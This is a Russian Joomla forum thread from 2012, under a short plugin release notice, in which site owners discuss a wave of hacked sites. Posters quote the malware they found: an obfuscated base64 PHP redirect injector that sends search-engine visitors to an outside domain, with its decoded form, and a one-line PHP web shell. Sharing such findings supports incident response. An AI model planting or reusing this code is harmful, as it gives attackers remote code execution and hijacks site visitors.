Новости Joomla

Вышел WT AmoCRM - RadicalForm v.1.4.0 плагин интеграции Joomla с AmoCRM

Вышел WT AmoCRM - RadicalForm v.1.4.0 плагин интеграции Joomla с AmoCRM

Плагин отправки данных в Amo CRM из форм обратной связи Joomla, созданных с помощью профессионального плагина Radical Form. Требует библиотеку WT Amo CRM library.

v.1.4.0. Что нового?

Выбор типа поля AmoCRM: сделка или контакт.

Для полей Radical Form можно выбрать назначение, куда их отправлять: в поле сделки (лида), контакта или в комментарий к сделке.

Строгая типизация данных.

Для полей появился параметр типизации, который позволяет привести данные к нужным для AmoCRM типам: строка, число и т.д. Это необходимо для корректной передачи данных полей. отличных от текстовых (например, поле типа флаг).

Системные требования

Плагин бесплатный. Поддерживает Joomla 4.3-6.x. Для работы необходима установленная и настроенная библиотека WT AmoCRM.

4AI для Joomla Готовим Контент с Помощью Искусственного Интеллекта!Ещё одно видео на канале Фёдора...

Модуль Joomla 6 - красивый обратный отсчет. Видео от Фёдора Васильева

1 2  Все   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 53 Ответов
  • 16624 Просмотров
*

vadim s. sabinich

  • Захожу иногда
  • 139
  • 11 / 0
  • переводчик-любитель
Массовые взломы
« : 10.01.2012, 11:08:33 »
Просто валом валят владельцы сайтов на Joomla. у всех в различных местах распихано такое:
Код
<?php           eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGFwcHluZXd5ZWFyLm9zYS5wbC8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));

В переводе на нормальный:
Код
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://happynewyear.osa.pl/");
exit();
}
}
}
}
Записан
VPS-хостинг на FirstVDS.ru || VPS/хостинг на ISPserver.com -- рефералам онлайн поддержка!
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Re: Массовые взломы
« Ответ #1 : 10.01.2012, 11:19:15 »
Ну хоть один из пацентов пусть даст полный доступ к хостингу, логам, не делая восстановления
Записан
*

NightGuard

  • Живу я здесь
  • 2927
  • 378 / 7
  • вжжж-вжжж
Re: Массовые взломы
« Ответ #2 : 10.01.2012, 11:59:44 »
Цитата: voland от 10.01.2012, 11:19:15
Ну хоть один из пацентов пусть даст полный доступ к хостингу, логам, не делая восстановления
Только один раз отписались о версии движка и компонентов, но там версия движка была старая, а у остальных - ХЗ :(
Записан
Идеология сверхпотребления более опасна для человечества, чем идеология гитлеровского тоталитаризма
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Массовые взломы
« Ответ #3 : 10.01.2012, 12:04:54 »
а что владельцы Wordpress не валят
и вообще
Цитировать
Просто валом валят владельцы сайтов на Joomla
куда валят от куда
вы что от имени хостера пишите, это бяка 99.999999% от фаривола хостера зависит, ломают через него, а не через движок
и через халатность админов
Записан
*

Град

  • Захожу иногда
  • 152
  • 67 / 0
  • В Багдаде все спокойно
Re: Массовые взломы
« Ответ #4 : 10.01.2012, 12:15:25 »
Цитата: NightGuard от 10.01.2012, 11:59:44
Только один раз отписались о версии движка и компонентов, но там версия движка была старая, а у остальных - ХЗ :(
я думаю тему на сваку
если не описато то что NightGuard сказал

а то можно подумать что Joomla вообще вся дырявая ;)
и кривые руки тут не причем! ;D ;D ;D

да может варезные шаблоны и компоненты использубт ;)
Записан
СИЛЬНЫЙ ЕСТ ВКУСНОГО !
*

NightGuard

  • Живу я здесь
  • 2927
  • 378 / 7
  • вжжж-вжжж
Re: Массовые взломы
« Ответ #5 : 10.01.2012, 12:24:26 »
Цитата: Град от 10.01.2012, 12:15:25
да может варезные шаблоны и компоненты использубт ;)
60-70% взломов из-за этого, остальное вирусы и халатность прокладки между креслом и монитором.
Записан
Идеология сверхпотребления более опасна для человечества, чем идеология гитлеровского тоталитаризма
*

vadim s. sabinich

  • Захожу иногда
  • 139
  • 11 / 0
  • переводчик-любитель
Re: Массовые взломы
« Ответ #6 : 10.01.2012, 12:32:05 »
написал больше чтобы поделиться информацией. Да, версию движка не посмотрел. А он там (на одном из сайтов) оказался весьма древнюч - 1.5.18
Думаю, тогда тему можно закрывать, либо оставить в назидание, чтобы держали версии ПО в актуальном состоянии -)
Записан
VPS-хостинг на FirstVDS.ru || VPS/хостинг на ISPserver.com -- рефералам онлайн поддержка!
*

tefun

  • Живу я здесь
  • 2540
  • 130 / 1
  • Легче всего обмануть себя
Re: Массовые взломы
« Ответ #7 : 10.01.2012, 12:44:07 »
меня вскрыли и еще 30-40 сайтов моего хостера (те вскрыли только хостера), когда позвонил хостеру мне сказали типа кто то балуется, те поменяйте индекспхп и права на 644 с 777 и все поменял index.php вроде год как работает и нормально

В моем случае вскрыли хостера
Записан
то что постится на фОруме, не вырубается тапОрами
_______________________________________________
Мысли и женщины вместе не приходят М.Ж.
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Массовые взломы
« Ответ #8 : 10.01.2012, 13:42:08 »
Цитата: voland от 10.01.2012, 11:19:15
Ну хоть один из пацентов пусть даст полный доступ к хостингу, логам, не делая восстановления

Да... без логов кака выходит.

П.С. Мой хостер сказал, кто не будет обновлять Joomla и часто ломатся, нафик без манейбека.
Записан
*

vadim s. sabinich

  • Захожу иногда
  • 139
  • 11 / 0
  • переводчик-любитель
Re: Массовые взломы
« Ответ #9 : 10.01.2012, 13:53:51 »
поковырялся с этим сайтиком. в images лежит странный post.php с содержимым
Код
<?php eval(base64_decode($_POST["php"])); ?>
Как оно туда попало и от кого аж 28 декабря уже врядли получится сказать - логи поротейчены 8(
Записан
VPS-хостинг на FirstVDS.ru || VPS/хостинг на ISPserver.com -- рефералам онлайн поддержка!
*

Panda

  • Захожу иногда
  • 54
  • 0 / 0
Re: Массовые взломы
« Ответ #10 : 10.01.2012, 14:56:37 »
Для статистики:

Версии 1.5.15 и 1.5.17 . Хостинг - teli.ru. Были заражены все php файлы в корневой директории жумлы. Взлом произошел 9 января.

Полторы недели назад такой же взлом произошел на другом хостинге, версия жумлы примерно такая же.
Записан
*

GDV

  • Завсегдатай
  • 1898
  • 201 / 5
Re: Массовые взломы
« Ответ #11 : 10.01.2012, 14:57:55 »
1 взломали не с рута?
2 обновляйте вовремя движек
3 вареза много стоит?
Записан
Убедительная просьба не писать в ЛС. Для решения Ваших проблем есть форум.
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Массовые взломы
« Ответ #12 : 10.01.2012, 14:58:45 »
Цитата: vadim s. sabinich от 10.01.2012, 13:53:51
поковырялся с этим сайтиком. в images лежит странный post.php с содержимым
Код
<?php eval(base64_decode($_POST["php"])); ?>
Как оно туда попало и от кого аж 28 декабря уже врядли получится сказать - логи поротейчены 8(

У меня такое тоже было.
Записан
*

Panda

  • Захожу иногда
  • 54
  • 0 / 0
Re: Массовые взломы
« Ответ #13 : 10.01.2012, 15:04:51 »
Цитата: GDV от 10.01.2012, 14:57:55
1 взломали не с рута?
2 обновляйте вовремя движек
3 вареза много стоит?

На первом сайте самописный шаб, на втором - милкивей, на третьем варезный. Причина взломов вижу в самом движке.
То что обновляться нужно, понятно и так, но когда у тебя за два десятка сайтов делать это регулярно весьма задолбно. Это я так..
Записан
*

Panda

  • Захожу иногда
  • 54
  • 0 / 0
Re: Массовые взломы
« Ответ #14 : 10.01.2012, 15:36:32 »
Обновленная информация, был не прав. С горечью обнаружил, что заражены все сайты (9 штук) на жумле (версии 1.5.15, 1.5.17, 1.5.22, 1.6.0, 1.6.3..) расположенные на одном хостинге. Еще до конца не разобрался, но похоже что заражены все php файлы! @#$%^!! Все заразились вчера.
Таким образом, причина заражения, либо мой комп либо хостер. Последние дней десять я отдыхал и не трогал сайты ни через админку, ни через ftp.
Получается, что дело в хостинге?
Записан
*

SmokerMan

  • Гуру
  • 5290
  • 720 / 26
Re: Массовые взломы
« Ответ #15 : 10.01.2012, 15:37:16 »
Цитата: Panda от 10.01.2012, 15:04:51
Причина взломов вижу в самом движке.
Оракул или провидец?
Что бы что-то утверждать надо это доказать!
Записан
*

tefun

  • Живу я здесь
  • 2540
  • 130 / 1
  • Легче всего обмануть себя
Re: Массовые взломы
« Ответ #16 : 10.01.2012, 15:39:15 »
Цитата: Panda от 10.01.2012, 15:36:32

Получается, что дело в хостинге?

думаю да, только вы можете узнать кто еще на вашем хостинге сидит? Просто мой хостер занимается разработкой сайтов и вывесил их на своем сайте и решил их проверить они тоже были взломаны :) значит хостер

У вас 99% - хостер :), тк все таки не будем исключать возможность с вашего компа :)
Записан
то что постится на фОруме, не вырубается тапОрами
_______________________________________________
Мысли и женщины вместе не приходят М.Ж.
*

Виталик

  • Завсегдатай
  • 1244
  • 130 / 0
Re: Массовые взломы
« Ответ #17 : 10.01.2012, 16:00:53 »
а можно как-то перехватить редирект? не удаляя этот код из файлов?
Записан
*

magyar

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
Re: Массовые взломы
« Ответ #18 : 10.01.2012, 17:19:08 »
думал я один такой, дня 2 назад узнал что ломанули сайт, восстановил из бэкапа, удалив все, разбираться лень было, сегодня узнал что взломали все сайты штук ~60 при том 95% Joomla (версии разные от 1.5.15- 1.5.25 и 1.7.3, как с компонентами так и без) и еще 5% wordpress, остальные не тронули, хостер reg.ru 2 учетки у каждого свой логин, пасс, ломанули так же и другие сайты которые хостятся у других хостеров, восстановить то восстановлю, вот только как предотвратить это безобразие?
Записан
*

tefun

  • Живу я здесь
  • 2540
  • 130 / 1
  • Легче всего обмануть себя
Re: Массовые взломы
« Ответ #19 : 10.01.2012, 17:24:10 »
Цитата: magyar от 10.01.2012, 17:19:08
вот только как предотвратить это безобразие?
карантин! В гугле а в первую очередь на форуме Оч много инфы
права папок иногда главный аргумент - смотря какой доступ...Пароли не сохранать нигде...

А я думаю что 90% зависит от хостера!
Записан
то что постится на фОруме, не вырубается тапОрами
_______________________________________________
Мысли и женщины вместе не приходят М.Ж.
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
Re: Массовые взломы
« Ответ #20 : 10.01.2012, 17:49:29 »
Цитата: tefun от 10.01.2012, 17:24:10
А я думаю что 90% зависит от хостера!
Ну да, если хостинг бесплатный то это печально... А вообще права доступа нужно смотреть. Пароль тоже не qwerty ставить. Joomla и расширения обновлять, с хостером не ругаться и варез не ставить ;)
Записан
*

tefun

  • Живу я здесь
  • 2540
  • 130 / 1
  • Легче всего обмануть себя
Re: Массовые взломы
« Ответ #21 : 10.01.2012, 17:59:25 »
Цитата: Langoliers от 10.01.2012, 17:49:29
Ну да, если хостинг бесплатный то это печально... А вообще права доступа нужно смотреть. Пароль тоже не qwerty ставить. Joomla и расширения обновлять, с хостером не ругаться и варез не ставить ;)
почему бесплатный? платный
может вопрос дешевый или нэт?
Записан
то что постится на фОруме, не вырубается тапОрами
_______________________________________________
Мысли и женщины вместе не приходят М.Ж.
*

Langoliers

  • Давно я тут
  • 621
  • 67 / 2
  • Если б Я изучал людей, то был бы паразитологом
Re: Массовые взломы
« Ответ #22 : 10.01.2012, 18:14:41 »
Цитата: tefun от 10.01.2012, 17:59:25
почему бесплатный? платный
может вопрос дешевый или нэт?
Бывает, что и на бесплатный ставят. А по хостингу могу сказать что  Sweb лучший на мой взгляд, хоть у них и не самые дешевые тарифы, зато у меня никогда не было проблем с хостингом у них. Тех поддержка на высочайшем уровне, и сидят там такие дядьки бородатые, каким мне никогда не стать, хоть и тоже админ.
Сейчас у меня colocation в PS и я сам хостинг продаю. Тут уж свои проблемы имеются...
Что то я от темы отошел... В общем если говорить о хостингах, то я советую Sweb.
Записан
*

tefun

  • Живу я здесь
  • 2540
  • 130 / 1
  • Легче всего обмануть себя
Re: Массовые взломы
« Ответ #23 : 10.01.2012, 18:36:42 »
Цитата: Langoliers от 10.01.2012, 18:14:41
Что то я от темы отошел... В общем если говорить о хостингах, то я советую Sweb.
Спасибо за советик, как раз нада хостинг чтоб цена-качество было пропорционально! Щас стока компаний развелось! Конечно каких то из них полюбому вскроют :) раз так много :)
а как выбрать? :) только методом тыка и личным участием , если все остальное устраивает ну или сарафаное радио
Записан
то что постится на фОруме, не вырубается тапОрами
_______________________________________________
Мысли и женщины вместе не приходят М.Ж.
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Re: Массовые взломы
« Ответ #24 : 10.01.2012, 19:06:45 »
Есть здесь такой VadimNExt пришел с проблемой http://joomlaforum.ru/index.php/topic,196202.msg1031270.html#msg1031270
Вот я думаю что у него хостер тоже толковый (а вот кто это вопрос)
просто приличное количество  хостеров либо дубы либо просто ахерели
мало что сами не включают функции безопасности но и доступ не дают
Записан
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Массовые взломы
« Ответ #25 : 10.01.2012, 19:43:15 »
Вполне возможно эксплуатируют неизвестную уязвимость Joomla 1.5.

Записан
*

magyar

  • Осваиваюсь на форуме
  • 15
  • 0 / 0
Re: Массовые взломы
« Ответ #26 : 11.01.2012, 10:56:13 »
Цитата: wishlight от 10.01.2012, 19:43:15
Вполне возможно эксплуатируют неизвестную уязвимость Joomla 1.5.

судя по всему не только для Joomla 1.5, т.к. 1.7.3 точно так же была взломана и wordpress (правда я  не смотрел его, глянул результат.)
к стать видимо ломали через бот нет, IP каждый раз новый и отличается не только в одной под сети начиная со штатов заканчивая Уругваем =)
я думаю уязвимость в текстовом редакторе который есть на всех cms версии разные и на 1.7.3 последняя
Записан
*

MaxFarSeer

  • Захожу иногда
  • 384
  • 29 / 0
  • http://ru.ah.fm:80
Re: Массовые взломы
« Ответ #27 : 16.01.2012, 10:26:29 »
тоже ломанули сайты у товарища, хостинг sweb (ломанули modX) и хостинг jino (ломанули жумла, 1.5 + VM)

такая же строчка кода
Записан
Не можете найти, где редактировать код? Читаем:
Быстрый и легкий поиск нужных файлов для редактирования чего-либо

Я много времени потратил на изменение готовых шаблонов, раскуривание чего и как там у буржуев, менял код вложенный в 100500 дивов, да они неплохи эти T3 и Warp (YOO), но стоит начать делать свой шаблон...Ребята!!! Всем советую! Свое - так легко настраивать!
*

Лат

  • Захожу иногда
  • 85
  • 19 / 6
  • Звоните 8 (905) 778-52-44
Re: Массовые взломы
« Ответ #28 : 21.01.2012, 05:55:38 »
У меня и моих клиентов (другие сайты располагаются на других хостингах) регулярно взламывают 20 сайтов. Версии Joomla 1.5.25. Меня ломали даже после смены всех паролей ftp. Причем ломают даже сайты, которых нет в индексе ни Яндекса ни Google.
Несколько знакомых также обратились с этой проблемой. И все приблизительно с начала года.
Вот думаю что делать...
Записан
*

tefun

  • Живу я здесь
  • 2540
  • 130 / 1
  • Легче всего обмануть себя
Re: Массовые взломы
« Ответ #29 : 21.01.2012, 09:18:35 »
Цитата: Лат от 21.01.2012, 05:55:38
У меня и моих клиентов (другие сайты располагаются на других хостингах) регулярно взламывают 20 сайтов. Версии Joomla 1.5.25. Меня ломали даже после смены всех паролей ftp. Причем ломают даже сайты, которых нет в индексе ни Яндекса ни Google.
Несколько знакомых также обратились с этой проблемой. И все приблизительно с начала года.
Вот думаю что делать...
См. подпись: "Домен за 99 рублей и надежный хостинг"  - может по этому?

проверьте права папок (644 должны быть) - я так делал но не помню на какие папки :(
Записан
то что постится на фОруме, не вырубается тапОрами
_______________________________________________
Мысли и женщины вместе не приходят М.Ж.
1 2  Все   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Частые взломы сайта

Автор VIPERR37

 Ответов: 3
Просмотров: 1020 		Последний ответ 25.02.2017, 00:52:38
от stopvirusby
Безопасность Joomla (Взломы - причины и следствия)

Автор Craze

 Ответов: 23
Просмотров: 3991 		Последний ответ 17.09.2015, 09:23:20
от wishlight
Предновогодние взломы

Автор wishlight

 Ответов: 8
Просмотров: 1998 		Последний ответ 22.01.2013, 15:41:56
от flyingspook
wso, america, шелл, очистка логов, отвественность за взломы..

Автор danik.html

 Ответов: 5
Просмотров: 2909 		Последний ответ 02.06.2012, 23:20:31
от flyingspook